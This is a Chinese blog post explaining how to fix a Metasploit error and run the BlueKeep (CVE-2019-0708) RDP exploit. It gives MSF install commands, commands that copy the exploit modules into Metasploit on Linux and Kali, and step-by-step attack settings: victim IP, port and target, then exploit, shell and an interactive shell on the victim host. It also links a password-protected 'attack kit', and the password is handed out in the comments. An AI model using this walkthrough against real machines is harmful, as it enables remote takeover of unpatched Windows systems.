[技术]MSF利用CVE-2019-0708工具EXP (0708解决报错)

作者: hackliu 分类: 技术文章 发布时间: 2019-09-08 00:30

CVE-2019-0708这个漏洞最早在今年5月份被曝光。

博主一早睡醒,看看朋友圈,发现被刷屏了,全都是CVE-2019-0708EXP的事情。我也无意再睡了,起床分享给大家。

据我目前了解到最新消息:

1.png

1.png

1.png

也就是说目前的EXP还不稳定,一不小心就会蓝屏,大家在做测试的时候小心点。目前EXP版本仅对windows 7 和 8有用。

GitHub上的EXP  

附上最新MSF功能公告:MetaSploit新功能Pingback Payloads

 https://github.com/rapid7/metasploit-framework/pull/12283

CVE-2019-0708RDP MSF攻击套件

CVE-2019-0708RDP MSF攻击套件.zip   (密码联系博主)

MSF会报错

[+] 10.120.1.185:3389 – The target is vulnerable.
[-] 10.120.1.185:3389 – Exploit failed: NameError undefined local variable or method `rdp_connect' for #Msf::Modules::Exploit__Windows__Rdp__Cve_2019_0708_bluekeep_rce::MetasploitModule:0x00007f19f2118650
Did you mean? disconnect
[
] Exploit completed, but no session was created.

如图

64471476-a8d60f80-d184-11e9-85e9-3302dc4d7848.png


按照下面步骤可解决报错

Linux安装MSF(metasploitframework-latest)

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb 
msfinstall && chmod 755 msfinstall && ./msfinstall

拷贝CVE-2019-0708攻击模块

其他Linux独立安装msf环境

root@HackLiu:#cp rdp.rb /opt/metasploit-framework/embedded/framework/lib/msf/core/exploit/rdp.rb
root@HackLiu:#cp rdp_scanner.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
root@HackLiu:#cp cve_2019_0708_bluekeep.rb /opt/metasploit-framework/embedded/framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
root@HackLiu:#cp cve_2019_0708_bluekeep_rce.rb /opt/metasploit-framework/embedded/framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

Kali系统部署msf环境

root@HackLiu:#cp rdp.rb /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
root@HackLiu:#cp rdp_scanner.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
root@HackLiu:#cp cve_2019_0708_bluekeep.rb /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
root@HackLiu:#cp cve_2019_0708_bluekeep_rce.rb usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

加载CVE-2019-0708攻击模块

使用msfconsole进入metasploit-framework
进入以后使用reload_all重新加载0708rdp利用模块

使用CVE-2019-0708模块攻击

使用msfconsole进入metasploit-framework
使用use exploit/windows/rdp/cve_2019_0708_bluekeep_rce启用0708RDP攻击模块
使用info查看工具相关信息以及设置
可见关键设置主要为RHOSTS\ RPORT \ target
使用set RHOSTS 受害机IP设置受害机IP
使用set RPORT 受害机PORT设置受害机RDP端口号
使用set target ID数字(可选为0-4)设置受害机机器架构这里我们使用的是VMware Fusion,那么target 3满足条件
使用exploit开始攻击,等待建立连接
建立连接以后,使用shell获得shell,再使用python获得交互式shell
随即完成攻击,成功拿到受害者主机权限

CVE-2019-0708攻击视频

CVE-2019-0708漏洞修复

CVE-2019-0708漏洞补丁工具使用手册.docx

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

7条评论
  • Chu

    2020年2月10日 14:39

    password please q7zy2m@gmail.com

    1. hackliu

      2020年3月7日 20:22

      hackliu.com

  • Hamze

    2019年9月9日 18:12

    what is password?

    1. hackliu

      2019年9月9日 22:33

      pass: hackliu.com

  • himalaya

    2019年9月9日 12:24

    感谢博主分享!求套件密码secguy@126.com

    1. hackliu

      2019年9月9日 22:33

      hackliu.com

  • himalayas

    2019年9月9日 12:24

    感谢博主分享,求套件密码secguy@126.com

himalaya进行回复 取消回复

邮箱地址不会被公开。 必填项已用*标注